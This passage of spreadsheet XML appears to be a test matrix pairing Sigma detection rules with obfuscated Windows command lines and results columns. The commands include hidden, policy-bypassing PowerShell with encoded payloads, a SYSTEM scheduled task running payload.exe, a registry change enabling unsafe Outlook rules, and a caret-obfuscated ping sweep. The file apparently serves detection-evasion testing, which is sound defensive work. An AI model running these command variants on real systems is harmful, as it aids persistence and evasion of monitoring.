      <c r="E235" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -NoNiNTeRActIVe -"WindowStyle" Hidden -EXECUtionpOLIcY Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="n"/>
      <c r="J235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="n"/>
      <c r="B236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C236" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D236" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E236" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -nOniNteRacTivE -"WindowStyle" Hidden -EXECuTIONpOlIcy Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43" t="n"/>
      <c r="J236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="n"/>
      <c r="B237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C237" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D237" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E237" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -noProFiLe -exEcUtiOnpOLicy Bypass -WInDowStyLe Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="43" t="n"/>
      <c r="J237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="43" t="n"/>
      <c r="B238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C238" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D238" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E238" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOPRofiLe -ExeCuTionpOlicy Bypass -winDoWSTYle Hidden -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="43" t="n"/>
      <c r="J238" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="n"/>
      <c r="B239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C239" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D239" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E239" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOpRoFIle /"ExecutionPolicy" Bypass /"WindowStyle" Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="43" t="n"/>
      <c r="J239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="n"/>
      <c r="B240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C240" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D240" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E240" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFile -EXEcuTiOnpOLiCY Bypass -"WindowStyle" Hidden -EnCOdEdcomMaNd UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I240" s="43" t="n"/>
      <c r="J240" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="43" t="n"/>
      <c r="B241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C241" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D241" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E241" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"NoProfile" -ws Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I241" s="44" t="n"/>
      <c r="J241" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="43" t="n"/>
      <c r="B242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C242" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D242" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E242" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NOPROfIlE -ws Hidden -ENcodedcoMMaNd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="44" t="n"/>
      <c r="J242" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="43" t="n"/>
      <c r="B243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C243" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D243" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E243" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -WiNdoWsTYLe Hidden -EncOdedcommanD &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I243" s="43" t="n"/>
      <c r="J243" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="44" t="n"/>
      <c r="B244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C244" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D244" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E244" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -noPRoFile /"WindowStyle" Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="44" t="n"/>
      <c r="J244" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="44" t="n"/>
      <c r="B245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C245" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D245" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E245" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -ws Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I245" s="44" t="n"/>
      <c r="J245" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="44" t="n"/>
      <c r="B246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C246" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D246" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E246" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NoProfILe -windOWstYLe Hidden -EncODEdCOMmANd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I246" s="44" t="n"/>
      <c r="J246" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="44" t="n"/>
      <c r="B247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C247" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D247" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E247" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exECUtIOnPOlicY Bypass -nop /"WindowStyle" Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="43" t="n"/>
      <c r="J247" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K247" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="n"/>
      <c r="B248" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C248" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D248" s="44" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E248" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\..\Admin\AppData\Local &amp;&amp; schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU SYSTEM"</t>
        </is>
      </c>
      <c r="F248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="44" t="n"/>
      <c r="J248" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K248" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dosfuscation</t>
        </is>
      </c>
      <c r="C249" s="44" t="inlineStr">
        <is>
          <t>Potential Dosfuscation Activity</t>
        </is>
      </c>
      <c r="D249" s="44" t="inlineStr">
        <is>
          <t>a77c1610-fc73-4019-8e29-0f51efc04a51</t>
        </is>
      </c>
      <c r="E249" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "s"e"t OBJ=calc.exe &amp;&amp; %O%B%J%"</t>
        </is>
      </c>
      <c r="F249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="n"/>
      <c r="J249" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K249" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C250" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D250" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E250" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "fsutil behavior set Symlink^Evaluation R2L:1"</t>
        </is>
      </c>
      <c r="F250" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G250" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H250" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="44" t="n"/>
      <c r="J250" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K250" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="n"/>
      <c r="B251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C251" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D251" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E251" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set a=Wscript.&amp;&amp; set b=Shell&amp;&amp; set c=Run&amp;&amp; call echo %a%%b%.%c%"</t>
        </is>
      </c>
      <c r="F251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="43" t="n"/>
      <c r="J251" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K251" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="n"/>
      <c r="B252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C252" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D252" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E252" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="43" t="n"/>
      <c r="J252" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K252" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="n"/>
      <c r="B253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C253" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D253" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E253" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKCU\Software\Microsoft\Office\16.0\Outlook\Security /v EnableUn^safeClientMailRules /t REG_DWORD /d 1 /f"</t>
        </is>
      </c>
      <c r="F253" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G253" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H253" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="43" t="n"/>
      <c r="J253" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K253" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="n"/>
      <c r="B254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C254" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D254" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E254" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F254" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G254" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I254" s="44" t="n"/>
      <c r="J254" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K254" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="n"/>
      <c r="B255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C255" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D255" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E255" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F255" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G255" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="43" t="n"/>
      <c r="J255" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K255" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="n"/>
      <c r="B256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C256" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D256" s="44" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E256" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F256" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G256" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H256" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I256" s="44" t="n"/>
      <c r="J256" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K256" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="n"/>
      <c r="B257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C257" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D257" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E257" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtIOnpOLiCY Bypass -"File" C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I257" s="44" t="n"/>
      <c r="J257" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K257" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C258" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D258" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E258" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -"File" C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="43" t="n"/>
      <c r="J258" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C259" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D259" s="44" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E259" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -fiLe C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I259" s="43" t="n"/>
      <c r="J259" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C260" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D260" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E260" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FILE C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="43" t="n"/>
      <c r="J260" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="n"/>
      <c r="B261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C261" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D261" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E261" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I261" s="43" t="n"/>
      <c r="J261" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="n"/>
      <c r="B262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C262" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D262" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E262" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F262" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G262" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H262" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I262" s="43" t="n"/>
      <c r="J262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="n"/>
      <c r="B263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C263" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D263" s="44" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E263" s="44" t="inlineStr">
        <is>
